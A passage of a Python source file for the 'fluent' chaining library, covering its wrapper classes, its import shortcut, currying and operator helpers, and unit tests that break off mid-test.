How's that for reading and writing if all the imports are inlined? Oh, and of course everything imported
via `lib` comes already pre-wrapped, so your code becomes even shorter.
More formally:The `lib` object, which is a wrapper around the python import machinery, allows to import
anything that is accessible by import to be imported as an expression for inline use.
So instead of
>>> import sys
>>> input = sys.stdin.read()
You can do
>>> input = lib.sys.stdin.read()
As a bonus, everything imported via lib is already pre-wrapped, so you can chain off of it immediately.
`lib` is also available on `_` which is itself just an alias for `wrap`. This is usefull if you want
to import fewer symbols from fluent or want to import the library under a custom name
>>> from fluent import _ # alias for wrap
>>> _.lib.sys.stdin.split('\n').map(str.upper).map(print)
>>> from fluent import _ as fluent # alias for wrap
>>> fluent.lib.sys.stdin.split('\n').map(str.upper).map(print)
Not sure if that is so super usefull though, as you could also just do:
>>> import fluent
>>> fluent.lib.sys.stdin.split('\n').map(str.upper).map(print)
`lambda` is great - it's often exactly what the doctor ordered. But it can also be a bit annoying
if you have to write it down everytime you just want to get an attribute or call a method on every
object in a collection.
>>> _([dict(fnord='foo'), dict(fnord='bar')]).map(lambda each: each['fnord']) == ['foo', 'bar']
>>> class Foo(object):
>>> attr = 'attrvalue'
>>> def method(self, arg): return 'method+'+arg
>>> _([Foo(), Foo()]).map(lambda each: each.attr) == ['attrvalue', 'attrvalue']
>>> _([Foo(), Foo()]).map(lambda each: each.method('arg')) == ['method+arg', 'method+arg']
Sure it works, but wouldn't it be nice if we could save a variable and do this a bit shorter?
I mean, python does have attrgetter, itemgetter and methodcaller - they are just a bit
inconvenient to use:
>>> from operator import itemgetter, attrgetter, methodcaller
>>> _([dict(fnord='foo'), dict(fnord='bar')]).map(itemgetter('fnord')) == ['foo', 'bar']
>>> class Foo(object):
>>> attr = 'attrvalue'
>>> def method(self, arg): return 'method+'+arg
>>> _([Foo(), Foo()]).map(attrgetter(attr)) == ['attrvalue', 'attrvalue']
>>> _([Foo(), Foo()]).map(methodcaller(method, 'arg')) == ['method+arg', 'method+arg']
So there is an object `_.each` that just exposes a bit of syntactic sugar for these
(and a few operators). Basically, everything you do to `_.each` it will do to each object
in the collection:
>>> _([1,2,3]).map(_.each + 3) == [4,5,6]
>>> _([1,2,3]).filter(_.each < 3) == [1,2]
>>> _([1,2,3]).map(- _.each) == [-1,-2,-3]
>>> _([dict(fnord='foo'), dict(fnord='bar')]).map(_.each['fnord']) == ['foo', 'bar']
>>> class Foo(object):
>>> attr = 'attrvalue'
>>> def method(self, arg): return 'method+'+arg
>>> _([Foo(), Foo()]).map(_.each.attr) == ['attrvalue', 'attrvalue']
>>> _([Foo(), Foo()]).map(_.each.call.method('arg')) == ['method+arg', 'method+arg']
Yeah I know `_.each.call.*()` is crude - but I haven't found a good syntax to get rid of
the .call yet. Feedback welcome.
A major nuisance for using fluent interfaces is methods that return None. Now this is mostly
a feature of python, where methods that don't have a return statement return None.
While this is way better than e.g. Ruby where that will just return the value of the last
expression - which means objects constantly leak internals, it is very annoying if you want to
chain off of one of these method calls. Fear not though, fluent has you covered. :)
Fluent wrapped objects will behave more like SmallTalk objects, in that they pretend
that every method that returns None actually returned self - thus allowing chaining. So this just works:
>>> _([3,2,1]).sort().reverse().call(print)
Even though both sort() and reverse() return None
Of course, if you unwrap at any point with `.unwrap` or `._` you will get the true return value of `None`.
This library tries to do a little of what underscore does for javascript. Just provide the missing glue to make the standard library nicer and easier to use - especially for short oneliners or short script. Have fun!
While I know that this is not something you want to use in big projects (see warning at the beginning)
I envision this to be very usefull in quick python scripts and shell one liner filters, where python was previously just that little bit too hard to use, that 'overflowed the barrel' and prevented you from doing so.
"""
"""Future Ideas:
or wrap([1,2,3]).call(len).times(yank_me)
Rework _.each.call.foo(bar) so 'call' is no longer a used-up symbol on each.
Also _.each.call.method(...) has a somewhat different meaning as the .call method on callable
could _.each.method(_, ...) work when auto currying is enabled?
Rework fluent so explicit unwrapping is required to do anything with wrapped objects.
(Basically calling ._ at the end)
The idea here is that this would likely enable the library to be used in big / bigger
projects as it looses it's virus like qualities.
* Maybe this is best done as a separate import?
* This would also be a chance to consider always using the iterator versions of
all the collection methods under their original name and automatically unpacking
/ triggering the iteration on ._? Not sure that's a great idea, as getting the
iterator to abstract over it is a) great and b) triggering the iteration is also
hard see e.g. groupby.
* This would require careful analysis where wrapped objects are handed out as arguments
to called methods e.g. .tee(). Also requires __repr__ and __str__ implementations that
make sense.
Roundable (for all numeric needs?)
round, times, repeat, if_true, if_false, else_
if_true, etc. are pretty much like conditional versions of .tee() I guess.
.if_true(function_to_call).else_(other_function_to_call)
"""
# Public API of the fluent module.
__all__ = [
    'wrap',  # generic wrapper factory; returns the appropriate Wrapper subclass for what is wrapped
    '_',  # _ is an alias for wrap
    'lib',  # wrapper around the python import machinery; access any importable package / function via attribute access
]
import typing
import re
import math
import types
import functools
import itertools
import operator
import collections.abc
def wrap(wrapped, *, previous=None, chain=None):
    """Factory that picks the right Wrapper subclass for *wrapped*.

    Main entry point into the fluent wonderland: wrap something once and
    everything you call off of it stays wrapped in the matching wrapper type.
    """
    # Never double-wrap: wrapping a wrapper is a no-op.
    if isinstance(wrapped, Wrapper):
        return wrapped
    # Inherit the chain target from the previous link when nothing new is given.
    if wrapped is None and chain is None and previous is not None:
        chain = previous.chain
    # The object whose type selects the wrapper class: prefer the wrapped
    # value, fall back to the chain target when the wrapped value is None.
    decider = chain if (wrapped is None and chain is not None) else wrapped
    dispatch = (
        (types.ModuleType, Module),
        (typing.Text, Text),
        (typing.Mapping, Mapping),
        (typing.AbstractSet, Set),
        (typing.Iterable, Iterable),
        (typing.Callable, Callable),
    )
    for candidate_type, wrapper_class in dispatch:
        if isinstance(decider, candidate_type):
            return wrapper_class(wrapped, previous=previous, chain=chain)
    return Wrapper(wrapped, previous=previous, chain=chain)
_ = wrap  # underscore-style shorthand alias
def wrapped(wrapped_function, additional_result_wrapper=None, self_index=0):
    """
    Using these decorators will take care of unwrapping and rewrapping the target object.
    Thus all following code is written as if the methods live on the wrapped object
    Also perfect to adapt free functions as instance methods.

    :param wrapped_function: free function to adapt as a method
    :param additional_result_wrapper: optional callable applied to the result before re-wrapping
    :param self_index: position at which the unwrapped value (self.chain) is
        spliced into the positional arguments of wrapped_function
    """
    @functools.wraps(wrapped_function)
    def wrapper(self, *args, **kwargs):
        # Splice the unwrapped chain target into the positional arguments at
        # self_index, so the free function sees it as a normal argument.
        result = wrapped_function(*args[0:self_index], self.chain, *args[self_index:], **kwargs)
        if callable(additional_result_wrapper):
            result = additional_result_wrapper(result)
        # Re-wrap so the fluent chain continues, remembering self as .previous.
        return wrap(result, previous=self)
    return wrapper
def unwrapped(wrapped_function):
    """Adapt a free function as a method whose result is returned as-is.

    Counterpart to wrapped(): the adapted function still receives the
    unwrapped chain value, but its return value is not wrapped again."""
    @functools.wraps(wrapped_function)
    def call_through(self, *args, **kwargs):
        return wrapped_function(self.chain, *args, **kwargs)
    return call_through
def wrapped_forward(wrapped_function, additional_result_wrapper=None, self_index=1):
    """Adapt a function that takes the current object as its *second* argument.

    Forwards through wrapped(), but splices the wrapped object in at position
    1 by default. This models free functions such as map(f, iterable), where
    the collection is not the first parameter - i.e. methods that just live
    on the wrong object.
    """
    return wrapped(
        wrapped_function,
        additional_result_wrapper=additional_result_wrapper,
        self_index=self_index,
    )
def tupleize(wrapped_function):
    """Force execution of iterator-returning methods by collecting into a tuple.

    Especially useful to derive the eager variants of the i* iterator methods.
    """
    @functools.wraps(wrapped_function)
    def eager(self, *args, **kwargs):
        produced = wrapped_function(self, *args, **kwargs)
        return wrap(tuple(produced), previous=self)
    return eager
class Wrapper(object):
    """Universal wrapper.
    This class ensures that all function calls and attribute accesses
    that can be caught in python will be wrapped with the wrapper again.
    This ensures that the fluent interface will persist and everything
    that is returned is itself able to be chained from again.
    Using this wrapper changes the behaviour of python source code in quite a big way.
    a) If you wrap something, if you want to get at the real object from any
    function call or attribute access off of that object, you will have to
    explicitly unwrap it.
    b) All returned objects will be enhanced by behaviour that matches the
    wrapped type. I.e. iterables will gain the collection interface,
    mappings will gain the mapping interface, strings will gain the
    string interface, etc.
    """
    def __init__(self, wrapped, *, previous, chain):
        # Either a real value or a chain fallback is required to chain from.
        assert wrapped is not None or chain is not None, 'Cannot chain off of None'
        self.__wrapped = wrapped
        self.__previous = previous
        self.__chain = chain
    # Proxied methods
    __getattr__ = wrapped(getattr)
    __getitem__ = wrapped(operator.getitem)
    def __str__(self):
        return "fluent.wrap(%s)" % self.chain
    def __repr__(self):
        return "fluent.wrap(%r)" % self.chain
    # REFACT consider whether I want to support all other operators too or whether explicit
    # unwrapping is actually a better thing
    __eq__ = unwrapped(operator.eq)
    # Breakouts
    @property
    def unwrap(self):
        # The raw wrapped value; may be None when chaining off a None return.
        return self.__wrapped
    _ = unwrap # alias
    @property
    def previous(self):
        # The wrapper this one was chained off of (None for the chain root).
        return self.__previous
    @property
    def chain(self):
        "Like .unwrap but handles chaining off of methods / functions that return None like SmallTalk does"
        if self.unwrap is not None:
            return self.unwrap
        return self.__chain
    # Utilities
    @wrapped
    def call(self, function, *args, **kwargs):
        "Call function with self as first argument"
        # Different from __call__! Calls function(self, …) instead of self(…)
        return function(self, *args, **kwargs)
    setattr = wrapped(setattr)
    getattr = wrapped(getattr)
    hasattr = wrapped(hasattr)
    delattr = wrapped(delattr)
    isinstance = wrapped(isinstance)
    issubclass = wrapped(issubclass)
    def tee(self, function):
        """Like tee on the shell
        Calls the argument function with self, but then discards the result and allows
        further chaining from self."""
        function(self)
        return self
    dir = wrapped(dir)
    vars = wrapped(vars)
# Sentinel marking the root of the import hierarchy for Module wrappers.
virtual_root_module = object()
class Module(Wrapper):
    """Importer shortcut.
    Attribute access on instances of this class is turned into an import
    statement - but as an expression that returns the wrapped imported object.
    Example:
    >>> lib.sys.stdin.read().map(print)
    Is equivalent to
    >>> import importlib
    >>> wrap(importlib.import_module('sys').stdin).read().map(print)
    But of course without creating the intermediate symbol 'stdin' in the current namespace.
    All objects returned from lib are pre-wrapped, so you can chain off of them immediately.
    """
    def __getattr__(self, name):
        # Prefer symbols that already exist on the wrapped module.
        target = self.chain
        if hasattr(target, name):
            return wrap(getattr(target, name))
        import importlib
        if target is virtual_root_module:
            # Top-level import, e.g. lib.os
            dotted_name = name
        else:
            # Submodule import, e.g. lib.os.path
            dotted_name = '.'.join((target.__name__, name))
        return wrap(importlib.import_module(dotted_name))
# The pre-built import root; lib.foo.bar imports and wraps module foo.bar.
wrap.lib = lib = Module(virtual_root_module, previous=None, chain=None)
class Callable(Wrapper):
    def __call__(self, *args, **kwargs):
        """Call through with a twist.
        If one of the args is `wrap` / `_`, then this acts as a shortcut to curry instead"""
        # REFACT consider to drop the auto curry - doesn't look like it is so super usefull
        # REFACT Consider how to expand this so every method in the library supports auto currying
        if wrap in args:
            return self.curry(*args, **kwargs)
        result = self.chain(*args, **kwargs)
        # Propagate the previous chain target so None results can still be
        # chained from (SmallTalk-style, see Wrapper.chain).
        chain = None if self.previous is None else self.previous.chain
        return wrap(result, previous=self, chain=chain)
    # REFACT rename to partial for consistency with stdlib?
    # REFACT consider if there could be more utility in supporting placeholders for more usecases.
    # examples:
    # Switching argument order?
    @wrapped
    def curry(self, *curry_args, **curry_kwargs):
        """Like functools.partial, but with a twist.
        If you use `wrap` or `_` as a positional argument, upon the actual call,
        arguments will be left-filled for those placeholders.
        For example:
        >>> _(operator.add).curry(_, 'foo')('bar') == 'barfoo'
        """
        placeholder = wrap
        def merge_args(curried_args, args):
            # Each call-time positional argument fills exactly one placeholder.
            assert curried_args.count(placeholder) == len(args), \
                'Need the right ammount of arguments for the placeholders'
            new_args = list(curried_args)
            if placeholder in curried_args:
                index = 0
                for arg in args:
                    # Find the next placeholder position, left to right, and fill it.
                    index = new_args.index(placeholder, index)
                    new_args[index] = arg
            return new_args
        @functools.wraps(self)
        def wrapper(*actual_args, **actual_kwargs):
            return self(
                *merge_args(curry_args, actual_args),
                **dict(curry_kwargs, **actual_kwargs)
            )
        return wrapper
    @wrapped
    def compose(self, outer):
        # Function composition: the returned callable computes outer(self(...)).
        return lambda *args, **kwargs: outer(self(*args, **kwargs))
    # REFACT consider aliasses wrap = chain = cast = compose
class Iterable(Wrapper):
    """Add iterator methods to any iterable.
    Most iterators in python3 return an iterator by default, which is very interesting
    if you want to build efficient processing pipelines, but not so hot for quick and
    dirty scripts where you have to wrap the result in a list() or tuple() all the time
    to actually get at the results (e.g. to print them) or to actually trigger the
    computation pipeline.
    Thus all iterators on this class are by default immediate, i.e. they don't return the
    iterator but instead consume it immediately and return a tuple. Of course if needed,
    there is also an i{map,zip,enumerate,...} version for your enjoyment that returns the
    iterator.
    """
    __iter__ = unwrapped(iter)
    @wrapped
    def star_call(self, function, *args, **kwargs):
        "Calls function(*self), but allows to prepend args and add kwargs."
        return function(*args, *self, **kwargs)
    # This looks like it should be the same as
    # starcall = wrapped(lambda function, wrapped, *args, **kwargs: function(*wrapped, *args, **kwargs))
    # but it's not. Why?
    @wrapped
    def join(self, with_what):
        """Like str.join, but the other way around. Bohoo!
        Also calls str on all elements of the collection before handing
        it off to str.join as a convenience.
        """
        return with_what.join(map(str, self))
    ## Reductors .........................................
    len = wrapped(len)
    max = wrapped(max)
    min = wrapped(min)
    sum = wrapped(sum)
    any = wrapped(any)
    all = wrapped(all)
    reduce = wrapped_forward(functools.reduce)
    ## Iterators .........................................
    # NOTE: each eager method must be defined after its i* variant, as
    # tupleize() closes over the class attribute defined just above it.
    imap = wrapped_forward(map)
    map = tupleize(imap)
    istar_map = istarmap = wrapped_forward(itertools.starmap)
    star_map = starmap = tupleize(istarmap)
    ifilter = wrapped_forward(filter)
    filter = tupleize(ifilter)
    ienumerate = wrapped(enumerate)
    enumerate = tupleize(ienumerate)
    ireversed = wrapped(reversed)
    reversed = tupleize(ireversed)
    isorted = wrapped(sorted)
    sorted = tupleize(isorted)
    @wrapped
    def igrouped(self, group_length):
        "s -> (s0,s1,s2,...sn-1), (sn,sn+1,sn+2,...s2n-1), (s2n,s2n+1,s2n+2,...s3n-1), ..."
        # Trailing elements that do not fill a complete group are dropped.
        return zip(*[iter(self)]*group_length)
    grouped = tupleize(igrouped)
    izip = wrapped(zip)
    zip = tupleize(izip)
    @wrapped
    def iflatten(self, level=math.inf):
        "Modeled after rubys array.flatten @see http://ruby-doc.org/core-1.9.3/Array.html#method-i-flatten"
        for element in self:
            if level > 0 and isinstance(element, typing.Iterable):
                for subelement in _(element).iflatten(level=level-1):
                    yield subelement
            else:
                yield element
        return
    flatten = tupleize(iflatten)
    igroupby = wrapped(itertools.groupby)
    def groupby(self, *args, **kwargs):
        # Need an extra wrapping function to consume the deep iterators in time
        result = []
        for key, values in self.igroupby(*args, **kwargs):
            result.append((key, tuple(values)))
        return wrap(tuple(result))
    def tee(self, function):
        "This override tries to retain iterators, as a speedup"
        if hasattr(self.chain, '__next__'): # iterator
            # Duplicate the iterator so the observer cannot exhaust ours.
            first, second = itertools.tee(self.chain, 2)
            function(wrap(first, previous=self))
            return wrap(second, previous=self)
        else:
            return super().tee(function)
class Mapping(Iterable):
    """Mapping wrapper: adds dict-specific conveniences on top of Iterable."""
    def __getattr__(self, name):
        """Support JavaScript like dict item access via attribute access.

        Names that are not keys of the wrapped mapping fall back to regular
        (wrapped) attribute access on Wrapper.
        """
        if name in self.chain:
            return self[name]
        # BUGFIX: super().__getattr__ is already bound, so self must not be
        # passed explicitly - doing so made the fallback call
        # getattr(chain, self, name) and raise TypeError instead of
        # delegating attribute access properly.
        return super().__getattr__(name)
    @wrapped
    def star_call(self, function, *args, **kwargs):
        "Calls function(**self), but allows to add args and set defaults for kwargs."
        return function(*args, **dict(kwargs, **self))
# Sets share the whole Iterable interface; nothing set-specific needed (yet).
class Set(Iterable): pass
class Text(Wrapper):
    """Supports most of the regex methods as if they were native str methods.

    Each forwarder calls the re module function of the same name with the
    wrapped string spliced in after the pattern (self_index=1 by default).
    """
    # Regex Methods ......................................
    search = wrapped_forward(re.search)
    match = wrapped_forward(re.match)
    # BUGFIX: fullmatch previously forwarded to re.match, which only anchors
    # at the start of the string - re.fullmatch anchors at both ends.
    fullmatch = wrapped_forward(re.fullmatch)
    split = wrapped_forward(re.split)
    findall = wrapped_forward(re.findall)
    # REFACT consider ifind and find in the spirit of the collection methods?
    finditer = wrapped_forward(re.finditer)
    # re.sub/subn take (pattern, repl, string): the wrapped string goes in at index 2.
    sub = wrapped_forward(re.sub, self_index=2)
    subn = wrapped_forward(re.subn, self_index=2)
def make_operator(name):
    """Build an Each method that produces a curried operator callable.

    E.g. for '__eq__', `_.each == x` yields a one-argument callable that
    computes operator.eq(argument, x) - the placeholder `wrap` is left-filled
    by curry() with the eventual argument.
    """
    __op__ = getattr(operator, name)
    @functools.wraps(__op__)
    def wrapper(self, *others):
        # `wrap` doubles as the curry placeholder for the future argument.
        return wrap(__op__).curry(wrap, *others)
    return wrapper
class Each(Wrapper):
    """Wrapper behind `_.each`: builds attrgetter/itemgetter/operator/methodcaller callables."""
    # Generate a method for every dunder operator in the operator module, so
    # expressions like `_.each + 3` or `_.each == 'foo'` yield callables.
    for name in dir(operator):
        if not name.startswith('__'):
            continue
        locals()[name] = make_operator(name)
    @wrapped
    def __getattr__(self, name):
        # `_.each.foo` -> operator.attrgetter('foo')
        return operator.attrgetter(name)
    @wrapped
    def __getitem__(self, index):
        # `_.each[0]` -> operator.itemgetter(0)
        return operator.itemgetter(index)
    @property
    def call(self):
        # `_.each.call.method(args)` -> operator.methodcaller('method', args)
        class MethodCallerConstructor(object):
            _method_name = None
            def __getattr__(self, method_name):
                self._method_name = method_name
                return self
            def __call__(self, *args, **kwargs):
                assert self._method_name is not None, \
                    'Need to access the method to call first! E.g. _.each.call.method_name(arg1, kwarg="arg2")'
                return wrap(operator.methodcaller(self._method_name, *args, **kwargs))
        return MethodCallerConstructor()
# Sentinel wrapped by `_.each`; Each never uses its wrapped value directly.
each_marker = object()
wrap.each = Each(each_marker, previous=None, chain=None)
import unittest
from pyexpect import expect
import pytest
# Shared base class so all fluent test cases can be selected together.
class FluentTest(unittest.TestCase): pass
class WrapperTest(FluentTest):
    """Behaviour of the generic Wrapper: wrapping, unwrapping and proxying."""
    def test_should_not_wrap_a_wrapper_again(self):
        wrapped = _(4)
        expect(type(_(wrapped).unwrap)) == int
    def test_should_provide_usefull_str_and_repr_output(self):
        expect(repr(_('foo'))) == "fluent.wrap('foo')"
        expect(str(_('foo'))) == "fluent.wrap(foo)"
    def test_should_wrap_callables(self):
        counter = [0]
        def foo(): counter[0] += 1
        expect(_(foo)).is_instance(Wrapper)
        _(foo)()
        expect(counter[0]) == 1
    def test_should_wrap_attribute_accesses(self):
        class Foo(): bar = 'baz'
        expect(_(Foo()).bar).is_instance(Wrapper)
    def test_should_wrap_item_accesses(self):
        expect(_(dict(foo='bar'))['foo']).is_instance(Wrapper)
    def test_should_error_when_accessing_missing_attribute(self):
        class Foo(): pass
        expect(lambda: _(Foo().missing)).to_raise(AttributeError)
    def test_should_explictly_unwrap(self):
        foo = 1
        expect(_(foo).unwrap).is_(foo)
    def test_should_wrap_according_to_returned_type(self):
        expect(_('foo')).is_instance(Text)
        expect(_([])).is_instance(Iterable)
        expect(_(iter([]))).is_instance(Iterable)
        expect(_({})).is_instance(Mapping)
        expect(_({1})).is_instance(Set)
        expect(_(lambda: None)).is_instance(Callable)
        class CallMe(object):
            def __call__(self): pass
        expect(_(CallMe())).is_instance(Callable)
        expect(_(object())).is_instance(Wrapper)
    def test_should_remember_call_chain(self):
        def foo(): return 'bar'
        expect(_(foo)().unwrap) == 'bar'
        expect(_(foo)().previous.unwrap) == foo
    def test_should_delegate_equality_test_to_wrapped_instance(self):
        # REFACT makes these tests much nicer - but probably has to go to make this library less virus like
        expect(_(1)) == 1
        expect(_('42')) == '42'
        callme = lambda: None
        expect(_(callme)) == callme
    def test_hasattr_getattr_setattr_delattr(self):
        expect(_((1,2)).hasattr('len'))
        expect(_('foo').getattr('__len__')()) == 3
        class Attr(object):
            def __init__(self): self.foo = 'bar'
        expect(_(Attr()).setattr('foo', 'baz').foo) == 'baz'
        expect(_(Attr()).delattr('foo').unwrap) == None
        expect(_(Attr()).delattr('foo').chain).isinstance(Attr)
        expect(_(Attr()).delattr('foo').vars()) == {}
    def test_isinstance_issubclass(self):
        expect(_('foo').isinstance(str)) == True
        expect(_('foo').isinstance(int)) == False
        expect(_(str).issubclass(object)) == True
        expect(_(str).issubclass(str)) == True
        expect(_(str).issubclass(int)) == False
    def test_dir_vars(self):
        expect(_(object()).dir()).contains('__class__', '__init__', '__eq__')
        class Foo(object): pass
        foo = Foo()
        foo.bar = 'baz'
        expect(_(foo).vars()) == {'bar': 'baz'}
class CallableTest(FluentTest):
    """Behaviour of the Callable wrapper: calling, currying and composing."""
    def test_call(self):
        expect(_(lambda: 3)()) == 3
        expect(_(lambda *x: x)(1,2,3)) == (1,2,3)
        expect(_(lambda x=3: x)()) == 3
        expect(_(lambda x=3: x)(x=4)) == 4
        expect(_(lambda x=3: x)(4)) == 4
    def test_star_call(self):
        expect(wrap([1,2,3]).star_call(str.format, '{} - {} : {}')) == '1 - 2 : 3'
    def test_should_call_callable_with_wrapped_as_first_argument(self):
        expect(_([1,2,3]).call(min)) == 1
        expect(_([1,2,3]).call(min)) == 1
        expect(_('foo').call(str.upper)) == 'FOO'
        expect(_('foo').call(str.upper)) == 'FOO'
    def test_tee_breakout_a_function_with_side_effects_and_disregard_return_value(self):
        side_effect = {}
        def observer(a_list): side_effect['tee'] = a_list.join('-')
        expect(_([1,2,3]).tee(observer)) == [1,2,3]
        expect(side_effect['tee']) == '1-2-3'
        def fnording(ignored): return 'fnord'
        expect(_([1,2,3]).tee(fnording)) == [1,2,3]
    def test_curry(self):
        expect(_(lambda x, y: x*y).curry(2, 3)()) == 6
        expect(_(lambda x=1, y=2: x*y).curry(x=3)()) == 6
    def test_auto_currying(self):
        expect(_(lambda x: x + 3)(_)(3)) == 6
        expect(_(lambda x, y: x + y)(_, 'foo')('bar')) == 'barfoo'
        expect(_(lambda x, y: x + y)('foo', _)('bar')) == 'foobar'
    def test_curry_should_support_placeholders_to_curry_later_positional_arguments(self):
        expect(_(operator.add).curry(_, 'foo')('bar')) == 'barfoo'
        expect(_(lambda x, y, z: x + y + z).curry(_, 'baz', _)('foo', 'bar')) == 'foobazbar'
        # expect(_(operator.add).curry(_2, _1)('foo', 'bar')) == 'barfoo'
    def test_compose_cast_wraps_chain(self):
        expect(_(lambda x: x*2).compose(lambda x: x+3)(5)) == 13
        expect(_(str.strip).compose(str.capitalize)(' fnord ')) == 'Fnord'
class SmallTalkLikeBehaviour(FluentTest):
    """Methods that return None chain off the previous value, like SmallTalk's `yourself`."""
    def test_should_pretend_methods_that_return_None_returned_self(self):
        expect(_([3,2,1]).sort().unwrap) == None
        expect(_([3,2,1]).sort().previous.previous) == [1,2,3]
        expect(_([3,2,1]).sort().chain) == [1,2,3]
        expect(_([2,3,1]).sort().sort(reverse=True).unwrap) == None
        expect(_([2,3,1]).sort().sort(reverse=True).previous.previous.previous.previous) == [3,2,1]
        expect(_([2,3,1]).sort().sort(reverse=True).chain) == [3,2,1]
    def test_should_chain_off_of_previous_if_our_functions_return_none(self):
        class Attr(object):
            foo = 'bar'
        expect(_(Attr()).setattr('foo', 'baz').foo) == 'baz'
    # TODO check individually that the different forms of wrapping behave according to the SmallTalk contract
    # wrapped
    # unwrapped
    # wrapped_forward
class IterableTest(FluentTest):
    """Behaviour of the Iterable wrapper: eager and lazy collection methods."""
    def test_should_call_callable_with_star_splat_of_self(self):
        expect(_([1,2,3]).star_call(lambda x, y, z: z-x-y)) == 0
    def test_join(self):
        expect(_(['1','2','3']).join(' ')) == '1 2 3'
        expect(_([1,2,3]).join(' ')) == '1 2 3'
    def test_any(self):
        expect(_((True, False)).any()) == True
        expect(_((False, False)).any()) == False
    def test_all(self):
        expect(_((True, False)).all()) == False
        expect(_((True, True)).all()) == True
    def test_len(self):
        expect(_((1,2,3)).len()) == 3
    def test_min_max_sum(self):
        expect(_([1,2]).min()) == 1
        expect(_([1,2]).max()) == 2
        expect(_((1,2,3)).sum()) == 6
    def test_map(self):
        expect(_([1,2,3]).imap(lambda x: x * x).call(list)) == [1, 4, 9]
        expect(_([1,2,3]).map(lambda x: x * x)) == (1, 4, 9)
    def test_starmap(self):
        expect(_([(1,2), (3,4)]).istarmap(lambda x, y: x+y).call(list)) == [3, 7]
        expect(_([(1,2), (3,4)]).starmap(lambda x, y: x+y)) == (3, 7)
    def test_filter(self):
        expect(_([1,2,3]).ifilter(lambda x: x > 1).call(list)) == [2,3]
        expect(_([1,2,3]).filter(lambda x: x > 1)) == (2,3)
    def test_zip(self):
        expect(_((1,2)).izip((3,4)).call(tuple)) == ((1, 3), (2, 4))
        expect(_((1,2)).izip((3,4), (5,6)).call(tuple)) == ((1, 3, 5), (2, 4, 6))
        expect(_((1,2)).zip((3,4))) == ((1, 3), (2, 4))
        expect(_((1,2)).zip((3,4), (5,6))) == ((1, 3, 5), (2, 4, 6))
    def test_reduce(self):
        # no iterator version of reduce as it's not a mapping
        expect(_((1,2)).reduce(operator.add)) == 3
    def test_grouped(self):
        expect(_((1,2,3,4,5,6)).igrouped(2).call(list)) == [(1,2), (3,4), (5,6)]
        expect(_((1,2,3,4,5,6)).grouped(2)) == ((1,2), (3,4), (5,6))
        expect(_((1,2,3,4,5)).grouped(2)) == ((1,2), (3,4))
    def test_group_by(self):
        actual = {}
        for key, values in _((1,1,2,2,3,3)).igroupby():
            actual[key] = tuple(values)
        expect(actual) == {
            1: (1,1),
            2: (2,2),
            3: (3,3)
        }
        actual = {}
        for key, values in _((1,1,2,2,3,3)).groupby():
            actual[key] = tuple(values)
        expect(actual) == {
            1: (1,1),
            2: (2,2),
            3: (3,3)
        }
    def test_tee_should_not_break_iterators(self):
        # This should work because the extend as well als the .call(list)
        # should not exhaust the iterator created by .imap()
        recorder = []
        def record(generator): recorder.extend(generator)
        expect(_([1,2,3]).imap(lambda x: x*x).tee(record).call(list)) == [1,4,9]
        expect(recorder) == [1,4,9]
    def test_enumerate(self):
        expect(_(('foo', 'bar')).ienumerate().call(list)) == [(0, 'foo'), (1, 'bar')]
        expect(_(('foo', 'bar')).enumerate()) == ((0, 'foo'), (1, 'bar'))
    def test_reversed_sorted(self):
        expect(_([2,1,3]).ireversed().call(list)) == [3,1,2]
        expect(_([2,1,3]).reversed()) == (3,1,2)
        expect(_([2,1,3]).isorted().call(list)) == [1,2,3]
        expect(_([2,1,3]).sorted()) == (1,2,3)
        expect(_([2,1,3]).isorted(reverse=True).call(list)) == [3,2,1]
        expect(_([2,1,3]).sorted(reverse=True)) == (3,2,1)
    def test_flatten(self):
        expect(_([(1,2),[3,4],(5, [6,7])]).iflatten().call(list)) == \
            [1,2,3,4,5,6,7]
        expect(_([(1,2),[3,4],(5, [6,7])]).flatten()) == \
            (1,2,3,4,5,6,7)
        expect(_([(1,2),[3,4],(5, [6,7])]).flatten(level=1)) == \
            (1,2,3,4,5,[6,7])
class MappingTest(FluentTest):
    """Behaviour of the Mapping wrapper: **-splat calls and attribute item access."""
    def test_should_call_callable_with_double_star_splat_as_keyword_arguments(self):
        def foo(*, foo): return foo
        expect(_(dict(foo='bar')).star_call(foo)) == 'bar'
        expect(_(dict(foo='baz')).star_call(foo, foo='bar')) == 'baz'
        expect(_(dict()).star_call(foo, foo='bar')) == 'bar'
    def test_should_support_attribute_access_to_mapping_items(self):
        expect(_(dict(foo='bar')).foo) == 'bar'
class StrTest(FluentTest):
    """Behaviour of the Text wrapper: regex methods forwarded to the re module."""
    def test_search(self):
        expect(_('foo bar baz').search(r'b.r').span()) == (4,7)
    def test_match_fullmatch(self):
        expect(_('foo bar').match(r'foo\s').span()) == (0, 4)
        expect(_('foo bar').fullmatch(r'foo\sbar').span()) == (0, 7)
    def test_split(self):
        expect(_('foo\nbar\nbaz').split(r'\n')) == ['foo', 'bar', 'baz']
        expect(_('foo\nbar/baz').split(r'[\n/]')) == ['foo', 'bar', 'baz']
    def test_findall_finditer(self):
        expect(_("bazfoobar").findall('ba[rz]')) == ['baz', 'bar']
        expect(_("bazfoobar").finditer('ba[rz]').map(_.each.call.span())) == ((0,3), (6,9))
    def test_sub_subn(self):
        expect(_('bazfoobar').sub(r'ba.', 'foo')) == 'foofoofoo'
        expect(_('bazfoobar').sub(r'ba.', 'foo', 1)) == 'foofoobar'
        expect(_('bazfoobar').sub(r'ba.', 'foo', count=1)) == 'foofoobar'
class ImporterTest(FluentTest):
    """Behaviour of the lib import shortcut (Module wrapper)."""
    def test_import_top_level_module(self):
        import sys
        expect(lib.sys) == sys
    def test_import_symbol_from_top_level_module(self):
        import sys
        expect(lib.sys.stdin) == sys.stdin
    def test_import_submodule_that_is_also_a_symbol_in_the_parent_module(self):
        import os
        expect(lib.os.name) == os.name
        expect(lib.os.path.join) == os.path.join
    def test_import_submodule_that_is_not_a_symbol_in_the_parent_module(self):
        import dbm
        expect(lambda: dbm.dumb).to_raise(AttributeError)
        def delayed_import():
            import dbm.dumb
            return dbm.dumb
        expect(lib.dbm.dumb) == delayed_import()
    def test_imported_objects_are_pre_wrapped(self):
        # BUGFIX: the comparison result used to be computed and discarded, so
        # this test could never fail - it has to go through expect().
        expect(lib.os.path.join('/foo', 'bar', 'baz').findall(r'/(\w*)')) == ['foo', 'bar', 'baz']
class EachTest(FluentTest):
    """Behaviour of `_.each`: attrgetter/itemgetter/operator/methodcaller building."""
    def test_should_produce_attrgetter_on_attribute_access(self):
        class Foo(object):
            bar = 'baz'
        expect(_([Foo(), Foo()]).map(_.each.bar)) == ('baz', 'baz')
    def test_should_produce_itemgetter_on_item_access(self):
